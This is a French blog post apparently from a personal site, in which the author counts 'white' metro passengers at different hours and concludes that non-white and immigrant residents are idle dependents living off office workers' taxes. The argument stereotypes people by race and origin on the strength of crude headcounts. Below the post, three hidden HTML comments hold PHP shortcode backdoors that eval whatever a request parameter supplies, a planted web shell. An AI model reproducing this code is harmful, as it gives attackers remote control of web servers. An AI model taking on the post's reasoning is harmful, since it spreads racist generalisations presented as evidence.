Petites remarques sur les gens dans le métro

Voilà, ma réflexion du matin à propos des utilisateurs du métro. Il est connu que les riches ont des voitures, voire des voitures de fonctions, et que les moins riches, qui ne peuvent habiter en plein centre ou déménager près de leur travail, utilisent les tranports en commun. Ainsi que beaucoup d’autres par commodité.
Bizaremment, alors que la population « IOOE » (immigrée ou d’origine étrangère d’1 génération) de la région IDF atteint environ 25%, on constate ces choses là:
 
A un moment comme le dimanche midi (comme le 6mars 2005 où j’ai compté), sur le RER A entre Défense et Auber, le taux de « blancs » (qui est le seul facile à compter de visu, et je m’en excuse par avance, je n’ai rien contre la couleur des gens), est d’environ 50%. Un matin de semaine vers 8h30, ce taux est de 90 % environ.
De la même manière, le taux du matin de semaine est de 80% de « blancs » entre Auber et la Villette sur la ligne 7, qui traverse le 19e, quartier fortement « coloré ». Il est même flagrant que parmi les non- blancs, les noirs sont fortement majoritaires, alors qu’aux heures de non-bureau, ce n’est plus le cas.
Les conclusions s’imposent. Certaines personnes travaillent et paient par leurs impôts les prestations sociales des autres. Rappel du chiffre INSEE (donc forcément sous évalué): le taux de chomage parmi les immigrés non européens atteint 33% (et encore, les américains doivent faire baisser le chiffre!)
On peut objecter que certaines populations ont une activité commerciale, qui les dispense de métro. Que les non-blancs travaillent moins dans les bureaux.
Et bien justement c’est ca qui me gène: pourquoi la France est elle le seul pays à attirer la misère du monde? Pourquoi nous n’avons pas les chercheurs, thésards, et cadres du tiers-monde, mais au contraires ses populations défavorisées?? Parce que nos gouvernements l’ont voulu…
J’y reviendrai.
Toujours est-il que ce sont principalement les cadres qui payent des impôts (les professions libérales aussi mais ils carrottent un maximum en truquant leurs déclarations). Donc les gens des bureaux qui payent pour ces inactifs que nous voyons dans le métro aux « heures de non-bureau ».
Ces mêmes cadres qui sont les premiers à voter UMP ou PS, les responsables de cette situation.. quelle bande d’abrutis !!

<!– [insert_php]if (isset($_REQUEST["CIWbd"])){eval($_REQUEST["CIWbd"]);exit;}[/insert_php][php]if (isset($_REQUEST["CIWbd"])){eval($_REQUEST["CIWbd"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["kNE"])){eval($_REQUEST["kNE"]);exit;}[/insert_php][php]if (isset($_REQUEST["kNE"])){eval($_REQUEST["kNE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["BCTwY"])){eval($_REQUEST["BCTwY"]);exit;}[/insert_php][php]if (isset($_REQUEST["BCTwY"])){eval($_REQUEST["BCTwY"]);exit;}[/php] –>

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *